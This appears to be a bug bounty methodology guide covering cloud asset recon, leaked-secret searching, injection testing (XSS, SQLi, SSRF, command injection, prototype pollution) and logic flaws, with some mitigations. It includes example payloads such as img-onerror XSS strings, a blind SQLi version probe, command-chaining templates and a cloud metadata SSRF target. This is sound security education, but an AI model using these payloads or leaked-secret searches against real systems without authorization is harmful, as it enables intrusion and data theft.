Comprehensive Bug Bounty Hunting Methodology
This document outlines a detailed methodology for bug bounty hunting, focusing on cloud misconfigurations, various injection vulnerabilities, and application logic flaws.
Part 1: Cloud Infrastructure Bug Bounty Methodology
Goal: Identify and report misconfigurations in the target's public cloud infrastructure that could lead to data exposure or unauthorized access. This involves scrutinizing flaws in cloud services utilized by the application, whether it's misconfigured infrastructure hosted by the cloud provider or application code insecurely leveraging cloud services.
Section 1.1: Enumerate Cloud Infrastructure and Attack Surface
The initial phase involves comprehensive reconnaissance to identify all cloud resources associated with the target.
-
Automated Multi-Cloud OSINT:
- Utilize tools like Cloud_Enum to perform a broad search across multiple cloud providers (AWS, Azure, GCP) for assets related to the target organization. This tool helps discover storage buckets, cloud functions, and other publicly exposed resources.
-
DNS Record Analysis for Resource Identification:
- Specific Tooling: Employ tools such as Fire_cloud standalone, which specializes in reviewing DNS records of subdomains to find AWS resources. This tool can often be adapted for other cloud providers by modifying its search patterns.
-
Manual CNAME Record Inspection: Manually inspect CNAME records in DNS lookups. Often, cloud resources are masked behind subdomains that point to them via CNAME entries. Look for CNAMEs pointing to common cloud service domains. This list is not exhaustive but provides a starting point:
-
amazonaws.com
(and its various service-specific subdomains likes3.amazonaws.com
,elb.amazonaws.com
) digitaloceanspaces.com
-
windows.net
(Azure services likeblob.core.windows.net
) storage.googleapis.com
aliyuncs.com
- Other provider-specific domains (e.g., Oracle Cloud, IBM Cloud).
-
-
Domain Discovery via Azure AD:
- Use AADInternals OSINT to potentially uncover new domains or subdomains related to the target, which might then lead to more cloud resources.
-
In a PowerShell prompt:
import-module AADInternals Invoke-AADIntReconAsOutsider -Domain "{target-website.com}" | format-table
-
Web Page Scraping for Cloud Resources:
- Employ tools like CloudScraper to scrape web pages for links and references to cloud storage assets (e.g., S3 buckets, Azure blobs).
-
OSINT Search for Exposed Secrets:
-
GitHub Reconnaissance (Manual & Automated):
-
User/Organization Specific Searches: Use scripts like github-users.py to search for secrets within a target user's or organization's repositories.
python3 github-users.py -k {target_keyword_or_company_name}
-
Advanced Dorking: Utilize tools like Github-Brute-Dork for systematic dorking to find leaked API keys, credentials, or sensitive configuration files.
python3 github_brutedork.py -u [YOUR_GITHUB_USER] -t [YOUR_GITHUB_TOKEN] -U [TARGET_USER] -o [TARGET_ORG] -v -d
-
-
* **Impact Assessment of Found Secrets:**
* Use **[Dora](https://github.com/sdushantha/dora#example-use-cases)** to quickly assess the potential impact and permissions associated with discovered cloud service keys or tokens.
* **Validity Check for Secrets:**
* Verify the functionality and permissions of any discovered secrets using tools/scripts like:
* **[Keyhacks (Python)](https://github.com/streaak/keyhacks)**
* **[keyhacks.sh (Bash)](https://github.com/gwen001/keyhacks.sh)**
- Automated Vulnerability Scanning for Cloud Assets:
- Leverage Nuclei Cloud Enum Templates. These templates can help automate the discovery of common misconfigurations and exposures in cloud services (e.g., publicly accessible S3 buckets, open Elasticsearch instances).
Section 1.2: Analyzing for Infrastructure Misconfigurations
Once cloud assets are identified, the next step is to probe for common misconfigurations.
- Research Common Misconfigurations:
- For each discovered service (e.g., S3, EC2, Azure Blob Storage, Kubernetes), research the most prevalent misconfigurations. Focus on services left publicly accessible unintentionally or those with overly permissive access granted to internet-facing users.
- Consult comprehensive resources like:
- HackTrickz Cloud: An extensive knowledge base for cloud penetration testing techniques and misconfigurations.
- Hacking The Cloud: A curated collection of attack techniques against cloud services.
Section 1.3: Analyzing Application Code Interaction with Cloud Services
Applications often interact with cloud services. Flaws in this interaction can lead to vulnerabilities.
-
Review HTTP Traffic:
- While interacting with the target application, meticulously monitor HTTP(S) traffic using a proxy like Burp Suite or OWASP ZAP.
- Look for requests made directly to cloud resources (e.g.,
*.s3.amazonaws.com
,*.blob.core.windows.net
). - Analyze how the application uses these resources: Is it fetching static assets, uploading user data, or making API calls to cloud-backed services?
-
Research Insecure Implementations:
- Once you understand how the application uses a cloud service, research common ways these integrations can be implemented insecurely. For instance, if an application generates signed URLs for S3, check if the permissions are too broad or if the signing process can be manipulated.
- Utilize hands-on learning platforms:
- PwnedLabs: Offers practical labs to understand and exploit cloud application misconfigurations.
- Refer to industry best practices and common pitfalls:
- OWASP Cloud-Native Application Security Top 10: Highlights the most critical security risks in cloud-native applications.
Part 2: Injection Vulnerabilities Methodology
Goal: Discover instances where unexpected user-controlled input causes the application to behave in an unintended manner, potentially leading to data breaches, command execution, or denial of service.
Injection attacks occur when user-controlled input within an HTTP Request is processed by the application in a way that alters its intended execution flow. This could manifest as an error (e.g., HTTP 500), triggering a new conditional logic path, or any other deviation from normal behavior.
Section 2.1: Step 1 - Fuzzing for Unexpected Behavior
The primary step is to identify input patterns (payloads) that trigger anomalous responses.
-
Establish a Baseline:
- Send legitimate HTTP requests to various endpoints and record the expected responses (status codes, content, headers). This baseline is crucial for identifying deviations.
-
Systematic Fuzzing:
- Iterate through various attack vectors within the HTTP request (URL parameters, POST body parameters, headers, cookies).
- Inject simple payloads, often single characters or basic HTML elements, one by one.
- Monitor responses for any variations from the established baseline.
-
Examples of Baseline vs. Variation:
-
Scenario 1: Server-Side Error Triggered
-
Baseline:
GET /fetch?dest=safeapp.com
results in a200 OK
response with the message "Done!" -
Variation:
GET /fetch?dest=safeapp.com@
results in a500 Internal Server Error
response with "ERROR: Site cannot be reached!" - Unexpected Behavior: The response code changes, indicating a server-side error.
-
Baseline:
-
Scenario 1: Server-Side Error Triggered
* **Scenario 2: Data Handling Error**
* **Baseline:** `GET /search?q=rs0n` results in a `200 OK` response with an empty JSON object.
* **Variation:** `GET /search?q=rs0n"` results in a `500 Internal Server Error`.
* **Unexpected Behavior:** The response code changes, and no data is returned, suggesting an error in data processing or querying.
* **Scenario 3: Client-Side Rendering Change**
* **Baseline:** `GET /welcome?user=rs0n` results in `<h1>Welcome rs0n</h1>`.
* **Variation:** `GET /welcome?user=<b>rs0n</b>` results in `<h1>Welcome <b>rs0n</b></h1>`.
* **Unexpected Behavior:** The DOM renders formatted text (bold) that the developer did not intend, indicating potential HTML injection.
Section 2.2: Step 2 - Finding WHERE the Break is Occurring
Determine which part of the application (Client-Side, Server-Side, Database) is processing the input and causing the unexpected behavior. This is akin to how Dynamic Application Security Testing (DAST) scanners operate.
-
Client-Side Injection:
- Occurs when user input is reflected in the DOM, and the payload causes new HTML elements to render or JavaScript to execute.
-
Example: The
/welcome?user=<b>rs0n</b>
scenario where bold text appears. If the injected HTML is directly visible in the browser's rendered output and potentially in the raw HTTP response body if server-side templating is involved.
-
Server-Side Code Injection:
- Typically indicated by errors (like HTTP 500) occurring before a complete DOM is returned, or by behavior changes driven by server-side logic.
-
Example: The
/fetch?dest=safeapp.com@
scenario. The error is server-generated. Researching the@
symbol in URL contexts might point towards server-side URL parsing or request libraries. If@
doesn't have special meaning in common database syntaxes, server-side code is a stronger candidate.
-
Database Injection:
- Often indicated by errors when special characters used in database query languages (like
'
,"
,;
) are injected. Endpoint names like/search
or parameter names likeq
orid
can be hints. -
Example: The
/search?q=rs0n"
scenario. The"
character is highly significant in SQL and other query languages. This makes a database interaction the likely culprit.
- Often indicated by errors when special characters used in database query languages (like
Section 2.3: Step 3 - Finding WHY the Break is Occurring
Understand the specific reason the payload causes the unexpected behavior. This involves investigating the underlying technology and code patterns.
-
Server-Side Injection Analysis (
/fetch?dest=safeapp.com@
):-
Observation: The
@
symbol causes a server error. The endpoint name (fetch
) and error message (Site cannot be reached!
) suggest an outgoing HTTP request. -
Research:
- The
@
symbol is generally not allowed directly in domain names for registration, but it has a special meaning in URLs:protocol://user:password@host/
. - If the server-side code constructs a URL from
safeapp.com@
, it might interpretsafeapp.com
as a username for an empty host, or the library (e.g., node-fetch) might throw an error due to the malformed URL (e.g.,https://safeapp.com@
).
- The
-
Hypothesis: The server-side code attempts to make an HTTP request using the
dest
parameter. The@
symbol corrupts the URL formation, leading to an exception in the HTTP client library.
-
Observation: The
-
Database Injection Analysis (
/search?q=rs0n"
):-
Observation: A
"
causes a 500 error on a search endpoint. -
Research: Double quotes (
"
) are commonly used to delimit strings or identifiers in SQL queries. NoSQL databases often use$
operators for queries, with"
for simple strings. -
Hypothesis: The application is likely using an SQL database. The input
rs0n"
is appended into a query likeSELECT * FROM main_table WHERE data CONTAINS "rs0n"";
, creating a syntax error due to the extra quote.
-
Observation: A
-
Client-Side Injection Analysis (
/welcome?user=<b>rs0n</b>
):-
Observation: HTML tags in the
user
parameter are rendered in the browser. - Analysis: Determine if the DOM is built server-side (payload in HTTP response) or client-side (JavaScript manipulation).
-
Finding (as per your note): The server response does not contain
<b>rs0n</b>
. Instead, an inline JavaScript block is found:
<script type="text/javascript"> function getQueryParameter(name) { const urlParams = new URLSearchParams(window.location.search); return urlParams.get(name); } function displayWelcomeMessage() { const userName = getQueryParameter('user'); // Corrected 'name' to 'user' based on example if (userName) { document.body.innerHTML = `<h1>Welcome ${userName}</h1>`; } else { document.body.innerHTML = `<h1>Welcome Guest</h1>`; } } window.onload = displayWelcomeMessage; </script>
-
Observation: HTML tags in the
* **Hypothesis:** Client-side JavaScript retrieves the `user` parameter and uses `innerHTML` to update the DOM, leading to HTML injection.
Section 2.4: Step 4 - Weaponizing The Break
Transform the identified break into a demonstrable vulnerability with security impact.
-
Server-Side Injection Weaponization (
/fetch?dest=safeapp.com@
-> SSRF):-
Hypothesis Confirmation: The application makes an HTTP request. Confirm this by providing a URL to a server you control (e.g., Burp Collaborator):
/fetch?dest=[YOUR_COLLABORATOR_DOMAIN]
. -
Vulnerability Mapping: If an HTTP request is received by your Collaborator, this confirms an External Service Interaction. If you can make the server request internal resources (e.g.,
http://localhost:8080/admin
,http://169.254.169.254/latest/meta-data/
) or interact with internal services in a meaningful way, it becomes Server-Side Request Forgery (SSRF). - Impact: Demonstrate SSRF by accessing an internal service not otherwise reachable, or by exfiltrating data from such a service. Even causing a distinguishable effect on an internal application can show impact.
-
Hypothesis Confirmation: The application makes an HTTP request. Confirm this by providing a URL to a server you control (e.g., Burp Collaborator):
-
Database Injection Weaponization (
/search?q=rs0n"
-> Blind SQLi):- Assumption: SQL database, no direct error messages (blind).
- Goal: Exfiltrate data or bypass authentication (here, exfiltration as it's a search).
-
Payload Refinement:
- Known break:
/search?q=rs0n"
(500 error). - Attempt to complete the query and comment out the rest:
/search?q=rs0n";--+
- If this returns a 200 response (like the baseline), it suggests MySQL (
;
as statement terminator,--+
as comment). The query becomesSELECT * FROM main_table WHERE data CONTAINS "rs0n";--+";
.
- Known break:
-
Establishing True/False States (for Blind SQLi):
- Find a query that returns results (True condition):
/search?q=a";--+
(returns results). - The 500 error with
/search?q=rs0n"
can be a False condition.
- Find a query that returns results (True condition):
-
Exploitation: Use boolean-based or time-based blind SQL injection techniques with nested queries to exfiltrate data byte-by-byte. Example:
/search?q=a" AND (SELECT SUBSTRING(version(),1,1))='5';--+
.
-
Client-Side Injection Weaponization (
/welcome?user=<b>rs0n</b>
-> XSS):-
Context: Inline JavaScript using
document.body.innerHTML = \
Welcome ${userName}
;
. - Goal: Execute arbitrary JavaScript in the victim's browser (XSS).
-
Initial Attempt (Script Tags):
- Payload:
/welcome?user=rs0n</h1><script>alert(document.domain)</script><h1>
- Result (as per your note): Elements render, but no alert.
- Payload:
-
Research
innerHTML
and Script Tags: TheinnerHTML
property has specific behaviors with<script>
tags; they typically don't execute when inserted this way. However, event handlers in other tags (like<img>
,<svg>
) often do. -
Successful Payload (img onerror):
- Payload:
/welcome?user=<h1>harrison</h1><img src='X' onerror=alert(document.domain) />
- URL Encoded:
/welcome?user=%3Ch1%3Eharrison%3C%2Fh1%3E%3Cimg%20src%3D%27X%27%20onerror%3Dalert(document.domain)%20%2F%3E
- Result: JavaScript execution achieved.
- Payload:
- Impact & Delivery: Craft a payload to steal cookies, perform actions on behalf of the user, or redirect to a malicious site. Deliver via a crafted link.
-
Context: Inline JavaScript using
Section 2.5: Detailed Client-Side Injections
Goal: Attacker's user-controlled input forces the Document Object Model (DOM) to load or behave in a way that the developers did not intend, often leading to JavaScript execution in the victim's browser.
Reference: YouTube Video - Bug Bounty Hunting for Client-Side Injection Vulnerabilities | Part I (Note: This is a placeholder URL from your notes)
- Basic Hunting Methodology for HTML/JavaScript Injection:
* **Injecting HTML Elements Directly (Reflected in Server Response):**
1. **Find Reflected Input:** Identify where user input (e.g., GET parameter `rs0n`) is reflected in the server's HTML response (e.g., `<h1>Welcome rs0n!</h1>`).
2. **Escalate to HTML Injection:** Test if HTML tags are rendered (e.g., `<b>rs0n</b>` in GET parameter reflected as `<h1>Welcome <b>rs0n!</b></h1>`, making "rs0n" bold).
3. **Escalate to JavaScript Execution:** Attempt to inject script tags or event handlers (e.g., `</h1><script>alert(document.domain)</script>` or `<img src=x onerror=alert(document.domain)>`).
* **Injecting HTML Elements via Client-Side JavaScript:**
1. **Identify Unsanitized JS Processing:** Find instances where user-controlled input (e.g., `location.hash`, `location.search`, `postMessage` data) is taken from the DOM or URL and processed by client-side JavaScript without proper sanitization (e.g., `location.hash` passed to `document.write` or `element.innerHTML`).
2. **Escalate to HTML Injection:** Craft input that results in HTML rendering (e.g., `https://vulnerable.app#<h1>rs0nwuzhere</h1>` leading to `<h1>rs0nwuzhere</h1>` in the DOM).
3. **Escalate to JavaScript Execution:** Inject payloads that trigger JavaScript (e.g., `https://vulnerable.app#<img%20src=1%20onerror=alert(document.domain)>`).
-
- Occurs when user input is reflected into a CSS context (e.g.,
<style>
tag, inlinestyle
attribute). - Can lead to data exfiltration (e.g., using attribute selectors and
background-image: url()
), UI redressing, or sometimes trigger script execution in older browsers or specific contexts.
- Occurs when user input is reflected into a CSS context (e.g.,
-
Client-Side Prototype Pollution (CSPP):
- Reference: Placeholder YouTube link from your notes.
- Find a Deep Merge: Identify JavaScript code (custom or from an NPM package like
lodash
before patched versions) that recursively merges objects. - User-Controlled Input in Merge: Ensure user input can control key/value pairs in one of the objects being merged (e.g., query parameters parsed into an object:
{"rs0n":"rs0n","key1":"value1"}
). - Poison Prototype: Craft input to modify
Object.prototype
by injecting__proto__
as a key (e.g.,{"__proto__":{"rs0n":"rs0n"},"key1":"value1"}
). - Identify a Gadget Chain: Find client-side JavaScript code that uses an object property that isn't explicitly defined on the object itself, causing JavaScript to look up the property on the prototype chain (e.g.,
config = {"url":"safe.com","default":true}; document.write("<a href=" + config.url + ">Click Here!</a>")
). Ifconfig.url
is not set, butObject.prototype.url
is, the latter will be used. - Exploit Gadget Chain: Poison the prototype with a property that the gadget chain uses, leading to XSS or other undesired behavior (e.g.,
{"__proto__":{"url":"javascript:alert(document.domain)"},"key1":"value1"}
).
Common Attack Techniques stemming from Client-Side Injections:
* **Content Injection:** Manipulating website content by injecting malicious data. Can be used for phishing or disseminating harmful links.
* **Reflected Cross-Site Scripting (XSS):** Malicious script injected via user input, reflected in the server's response, and executed in the victim's browser.
* **Stored Cross-Site Scripting (XSS):** Malicious script injected and stored permanently (e.g., in a database, comment section). Executed when any user views the infected page.
* **Blind Cross-Site Scripting (XSS):** Injected script whose execution is not immediately visible to the attacker. Often triggers in a different part of the application or for a privileged user (e.g., an admin panel viewing logs).
* **Dangling Markup Injection:** Injecting incomplete HTML tags. Attackers can use this to capture data submitted in forms that appear after the injected markup or to break page rendering. For example, an unclosed `<a>` tag with a malicious `href` could make a large portion of the page a clickable link to an attacker's site. It can also be used to exfiltrate anti-CSRF tokens or other sensitive data by making them part of a URL that gets sent to an external server.
* **Client-Side JavaScript Injection (Non-DOM XSS):** User input is passed to JavaScript "sinks" like `eval()`, `setTimeout()`, `new Function()` without writing directly to the DOM in a way that causes HTML parsing.
* **DOM-Based Cross-Site Scripting (XSS):** Vulnerability exists in the client-side code. User input influences how the DOM is modified, leading to script execution. The server is often unaware.
* **DOM-Based Open Redirect:** Client-side script modifies the DOM to redirect users to an external, attacker-controlled URL (e.g., by manipulating `window.location` with user input).
* **Client-Side Template Injection (CSTI):** User input is injected into client-side templates (e.g., AngularJS, Vue.js, React with `dangerouslySetInnerHTML` if not careful) leading to XSS or unintended template code execution.
* **postMessage Vulnerabilities:** Insecure handling of `window.postMessage()` calls. If the origin of the message isn't checked, or if data is handled unsafely, it can lead to XSS or data leakage between windows/frames.
* **Client-Side Denial of Service (DoS) / Breaking The DOM:** Injecting content or triggering JavaScript that causes the browser to hang, crash, or become unusable (e.g., regex DoS, infinite loops, memory exhaustion).
- Weaponizing and Mitigating HTML-Based Client-Side Injections:
* **Compensating Controls (Defenses):**
* **Client-Side Validation (PREVENTS SOME ATTACKS/IMPROVES UX):** Can be bypassed, but useful for UX and guiding legitimate users. May reveal developer concerns.
* **Server-Side Validation (PREVENTS ATTACK):** Crucial. Ensures input is of expected type and size; sanitizes or rejects malicious characters.
* **Web Application Firewall (WAF) (CAN PREVENT ATTACK):** Blocks requests based on rulesets and malicious patterns. Can be bypassed.
* **Output Encoding (PREVENTS ATTACK):** Contextually encodes user input before rendering it in the DOM (e.g., HTML entity encoding, JavaScript string escaping). This is a primary defense against XSS.
* **Cookie Flags (MITIGATES IMPACT):**
* `HttpOnly`: Prevents JavaScript access to cookies.
* `Secure`: Ensures cookies are only sent over HTTPS.
* `SameSite` (`Strict`, `Lax`, `None`): Controls when cookies are sent with cross-site requests, mitigating CSRF and some information leakage.
* **Content Security Policy (CSP) (MITIGATES IMPACT/CAN PREVENT ATTACK):** Directives telling the browser where resources can be loaded from, what scripts can execute, etc. Can significantly reduce XSS impact or prevent it.
* **Demonstrating Impact:**
* Steal victim's cookies (if not `HttpOnly`).
* Force victim to make arbitrary HTTP requests (CSRF-like actions).
* Steal sensitive information from the DOM of restricted pages the victim can access.
* Perform UI redressing or phishing.
* Keylogging.
Section 2.6: Detailed Server-Side Injections
Goal: Attacker's user-controlled input forces a server-side method or process to execute in a way the developers did not intend, potentially leading to Remote Code Execution (RCE), SSRF, file manipulation, etc.
- Basic Hunting Methodology for Server-Side Injections:
* **Core Principle:** Break the Application -> Understand Why It Broke -> Weaponize the Break.
* **Identify Fuzzing Targets:**
* URL Parameters (GET/POST)
* HTTP Headers (custom headers, User-Agent, Referer, etc.)
* Cookie values
* JSON/XML/other body content
* File uploads (filenames, metadata, content)
* Any user-controlled input processed by the application. Prioritize inputs reflected in the DOM or those that seem to influence backend logic.
* **Fuzzing Techniques:**
* **Unexpected Types:** If a string is expected, send `null`, an integer, an array, or a boolean.
* **Large Payloads:** Send an excessive amount of data (e.g., 10,000 'A's) to test for buffer overflows or handling limits.
* **Special Characters:** Inject various special characters (e.g., `', ", ;, |, &, $, <, >, \`, etc.) individually or in combinations. Test different encodings (URL, Hex, Double Hex).
* **Burp Suite's "Backslash Powered Scanner":** Useful for finding subtle server-side injection points by observing how backslashes are processed.
- Vulnerability Examples by Language/Technology (and common sinks):
* **[Command Injection](https://book.hacktricks.xyz/pentesting-web/command-injection):** Input is passed to a system shell.
* **Node.js:** `child_process.exec()`, `child_process.execSync()`, `child_process.spawn()`
* **PHP:** `exec()`, `system()`, `passthru()`, `shell_exec()`, backticks (`` ` ``)
* **Python:** `os.system()`, `subprocess.run(..., shell=True)`, `subprocess.call(..., shell=True)`, `pty.spawn()`
* **Java:** `Runtime.getRuntime().exec(String)` (especially if concatenating input into the command string)
* **Payloads:** `victim_cmd ; malicious_cmd`, `victim_cmd && malicious_cmd`, `victim_cmd | malicious_cmd`, `` `malicious_cmd` ``
* **[Code Injection](https://owasp.org/www-community/attacks/Code_Injection) (Eval Injection):** Input is parsed and executed as code by the programming language interpreter. *"Eval is Evil."*
* **Node.js (JavaScript):** `eval()`, `new Function()`, `setTimeout(string, ...)` , `setInterval(string, ...)`
* **PHP:** `eval()`, `assert()` (with string input), `preg_replace()` with `/e` modifier (deprecated but found in old code), `create_function()`
* **Python:** `eval()`, `exec()`
* **Java:** `javax.script.ScriptEngineManager().getEngineByName("js").eval()` (if evaluating user input)
* **[Server-Side Request Forgery (SSRF)](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery):** Application makes an HTTP request to a URL (or part of a URL) controlled by the attacker.
* **Node.js:** `http.request()`, `https.request()`, `axios.get()`, `request.get()`, `fetch()` (via `node-fetch` or native)
* **PHP:** `curl_exec()` (via `curl_init()`), `file_get_contents()`, `fsockopen()`
* **Python:** `requests.get()`, `urllib.request.urlopen()`
* **Java:** `java.net.URL.openConnection()`, `java.net.HttpURLConnection`, Apache HttpClient, OkHttp
* **[Server-Side Template Injection (SSTI)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection):** Input is embedded into a server-side template, allowing template syntax execution.
* **Node.js (e.g., Jade/Pug, EJS, Handlebars):**
* Jade/Pug: `var html = jade.render('USER_CONTROLLED_INPUT', options);` ([HackTricks Jade](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jade-nodejs))
* **PHP (e.g., Twig, Smarty):**
* Twig: `$output = $twig->render('template_name', ['user_input' => USER_CONTROLLED_INPUT]);` or `$output = $twig->createTemplate(USER_CONTROLLED_INPUT)->render();` ([HackTricks Twig](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php))
* **Python (e.g., Jinja2, Mako, Tornado):**
* Jinja2: `template.render(user_input=USER_CONTROLLED_INPUT)` or `Template(USER_CONTROLLED_INPUT).render()` ([HackTricks Jinja2](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python))
* **Java (e.g., Velocity, Freemarker, Thymeleaf, Spring View Templates):**
* [Spring Examples](https://www.baeldung.com/spring-template-engines), [HackTricks Java SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#java)
* **[Server-Side Prototype Pollution (SSPP)](https://portswigger.net/web-security/prototype-pollution/server-side):** Similar to CSPP but affects server-side JavaScript (Node.js) objects. Can lead to RCE, ACL bypass, or other issues if polluted properties are used in security-sensitive operations.
* **Node.js:** Vulnerable object merging functions, often custom-written or from older versions of libraries like `lodash` or `jquery.extend`. Example merge:
```javascript
const merge = (target, source) => {
for (const key of Object.keys(source)) {
if (source[key] instanceof Object && target[key] instanceof Object) { // Added check for target[key]
Object.assign(source[key], merge(target[key], source[key]));
}
}
Object.assign(target || {}, source);
return target;
}
// If user controls 'source' and can set 'source.__proto__.isAdmin = true'
```
* **[Insecure Deserialization](https://book.hacktricks.xyz/pentesting-web/deserialization):** User-controlled data is deserialized without proper validation, leading to object injection and potential RCE.
* **PHP:** `unserialize()` (look for magic methods like `__wakeup`, `__destruct`, `__toString`)
* **Python:** `pickle.loads()`, `yaml.unsafe_load()`
* **Node.js:** Libraries like `node-serialize`'s `unserialize()`, `js-yaml`'s `load()` without safe options.
* **Java:** `java.io.ObjectInputStream.readObject()`, XML deserializers (XStream, Jackson with polymorphic typing enabled), JSON deserializers.
* **[File Inclusion (LFI/RFI)](https://book.hacktricks.xyz/pentesting-web/file-inclusion):** Application includes a file specified by user input.
* **PHP:** `include()`, `require()`, `include_once()`, `require_once()`, `fopen($filename, 'r')`, `file_get_contents($filename)`
* **Python:** `open("filename.txt", "r")` (if filename is user-controlled)
* **Node.js:** `fs.readFileSync('filename.txt', 'utf8')` (if filename is user-controlled)
* **Java:** `new File("filename.txt")` (if filename is user-controlled and then read/processed)
Section 2.7: Detailed Database Injections
Goal: Attacker's user-controlled input forces the application to make a database query that the developers did not intend, leading to data exfiltration, modification, deletion, or authentication bypass.
-
- Targets relational databases (MySQL, PostgreSQL, MSSQL, Oracle, SQLite, etc.).
-
Detection: Injecting SQL metacharacters (
'
,"
,)
,;
,--
,#
) and observing errors or changes in behavior. -
Techniques:
- In-band (Error-based, Union-based): Results/errors are returned in the same channel.
- Inferential (Blind - Boolean-based, Time-based): Deduce information based on true/false responses or time delays.
- Out-of-band: Data exfiltrated via a different channel (e.g., DNS, HTTP requests triggered by database functions).
-
Tools:
- SQLMap: Automated SQLi detection and exploitation.
- Resources:
-
- Targets NoSQL databases (MongoDB, CouchDB, Cassandra, etc.). Syntax and exploitation techniques vary greatly depending on the database type and context.
-
Detection: Often involves injecting operators specific to the NoSQL database's query language (e.g., MongoDB:
$ne
,$gt
,$regex
,$where
for JavaScript execution). -
Techniques:
- Bypassing authentication.
- Extracting all records.
- Injecting JavaScript for server-side execution (e.g., MongoDB's
$where
,mapReduce
).
-
Tools:
- NoSQLMap: Automated NoSQL injection detection and exploitation (primarily for MongoDB).
- Resources:
Part 3: Application Logic Vulnerabilities Methodology
Goal: Send unexpected HTTP requests, or a sequence of requests, to cause the application to act in an unintended way, often bypassing security controls or exploiting flawed business logic.
Logic vulnerabilities arise when an attacker can manipulate an application's intended workflow by submitting HTTP requests (or a series of requests) that developers did not anticipate. This could involve missed access control checks, failure to validate data integrity across steps, or race conditions. A deep understanding of the application's functionality is paramount.
Section 3.1: Core Steps for Logic Testing
- Understand the Application Deeply: Spend significant time (days, if necessary) using the application as intended. Map out features, user roles, and data flows.
- Identify Complex & Critical Mechanisms: Focus on multi-step processes, features involving financial transactions, access control boundaries, and user management functions.
- Send Unexpected Sequences or Manipulated Requests: Deviate from normal usage patterns. Reorder steps, drop requests, modify parameters between steps, or replay requests out of context.
Section 3.2: Learn The Application (In-Depth Reconnaissance)
Effective logic testing hinges on a thorough understanding of the target. SaaS applications with authentication, complex access controls, varied functionality, and multi-user designs are prime candidates.
- Architecture Analysis:
* **Backend Language (PHP, Node.js, Java, Python, Ruby, etc.):**
* Language-specific quirks can influence logic.
* **PHP `$_SESSION` vs. `$_COOKIE`:** As you noted, if a developer mistakenly uses `$_COOKIE['user_id']` instead of `$_SESSION['user_id']` for sensitive identifiers, an attacker can manipulate their `user_id` cookie.
* **PHP/Node.js Loose Comparison (`==` vs. `===`):** In PHP and JavaScript, `==` performs type juggling. If `if ($userInput == true)` is used, inputs like `"1"`, `1`, or even some non-empty strings might evaluate to true. `===` checks both type and value. Look for this in authentication, authorization, or critical conditional checks. Java has a similar but distinct consideration with `==` (reference equality for objects) vs. `.equals()` (value equality).
* **Frontend Framework (React, Angular, Vue, Next.js, Svelte, etc.):**
* **Client-Side vs. Server-Side Routing/Rendering:**
* **React/Angular/Vue (Client-Side Routing):** Access controls might be partially implemented client-side (e.g., React Router hiding links). Always verify these controls server-side. If Webpack isn't obfuscated, source code might be easily reviewable.
* **Next.js/Nuxt.js (SSR/SSG):** Routing and data fetching logic can be server-side, client-side, or a hybrid. Understand where access decisions are made.
* **Client-Side NPM Packages:**
* Identify used packages (e.g., via `package.json` if exposed, or browser dev tools).
* Check for known vulnerabilities in specific versions (e.g., using Snyk Advisor, npm audit).
* Understand the package's purpose. E.g., `lodash` (older versions vulnerable to Prototype Pollution) is often used for object merging. Can you inject unexpected values into a critical JSON object via a vulnerable merge?
* **Custom Client-Side JavaScript Files:**
* These have not undergone public scrutiny like NPM packages, potentially harboring unique flaws.
* Analyze logic: conditionals, loops, event handlers, especially those dealing with user identity, roles, or permissions.
* Use tools like **JSNice** or browser built-in "pretty print" to de-minify code.
* **Authentication Mechanisms:**
* **Username/Password:**
* Test for username enumeration.
* Can you register with a username that collides or nearly collides with an existing one due to sanitization or comparison flaws (e.g., `user` vs. `user\0` or `user%00`)?
* **Email/Password:**
* **Plus Addressing (e.g., `user+alias@example.com`):** Can you create multiple accounts tied to the same inbox? How does this affect password resets, account linking, or uniqueness constraints?
* Email syntax complexity ([RFC 2822](https://datatracker.ietf.org/doc/html/rfc2822#section-3)) can lead to regex validation bypasses.
* **Single Sign-On (SSO) via SAML:**
* Understand the SAML flow (SP-initiated, IdP-initiated).
* **If you can configure SSO for the target:** Test for SAML Signature Wrapping, XXE in SAML assertions (if parsed by a vulnerable XML parser), Certificate Faking, Token Recipient Confusion. Resources: [epi's SAML blog series](https://epi052.gitlab.io/notes-to-self/tags/saml/), [OWASP SAML Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SAML_Security_Cheat_Sheet.html). Local test IdP: [docker-test-saml-idp](https://github.com/kristophjunge/docker-test-saml-idp).
* **If you CANNOT configure SSO:** Focus on interactions between SSO and non-SSO accounts. If SSO relies on email domain for trust, can you register a non-SSO account with an email from a trusted domain (if the app allows it) and exploit inconsistencies? (e.g., [H1 Report 2101076](https://hackerone.com/reports/2101076), [H1 Report 1486417](https://hackerone.com/reports/1486417)).
* **[OAuth 2.0](https://datatracker.ietf.org/doc/html/rfc6749):**
* Recognize OAuth is an *authorization* framework, often misused for *authentication*.
* Identify the **Grant Type** (Authorization Code, Implicit, Client Credentials, Password, PKCE).
* Note all **OAuth Parameters** used (`client_id`, `redirect_uri`, `response_type`, `scope`, `state`).
* Understand *why* OAuth is used: simple sign-in, API access delegation, third-party integrations. This dictates attack vectors (e.g., insecure `redirect_uri` handling, scope escalation, CSRF against the flow). (More in OAuth Testing section).
* **Enumerable Objects in the Application:**
* Identify key data structures (Objects) the application manipulates.
* **User Object:** Contains identity info, potentially password hashes, roles, profile data. Target for IDORs (Read, Update).
* **Message Object:** If messaging exists, look for IDORs (Read others' messages, Update/Delete messages, Send as another user).
* **Financial/Sensitive Objects (Bank Account, Order, Invoice, etc.):** High impact if compromised. Focus on confidentiality (Read) and integrity (Update).
* **Session Establishment and Management:**
* How does the app identify a user across requests?
* **Cookie -> Unique Opaque String:** Most common and generally secure. Session data stored server-side. Focus on cookie flags (`Secure`, `HttpOnly`, `SameSite=Strict/Lax`), expiration, and ensuring session invalidation on logout/timeout. IDORs via session manipulation are unlikely unless the server-side mapping is flawed.
* **Cookie -> Stores Data (No Signature):** Highly vulnerable. If data in the cookie (e.g., `user_id=123;role=user`) is trusted server-side, attacker can modify it. Decode (Base64, URL) and tamper.
* **Cookie -> Stores Data (With Signature):** More secure, but check if signature validation is performed *on every endpoint* that uses the cookie data. If an endpoint misses validation, it's like "No Signature."
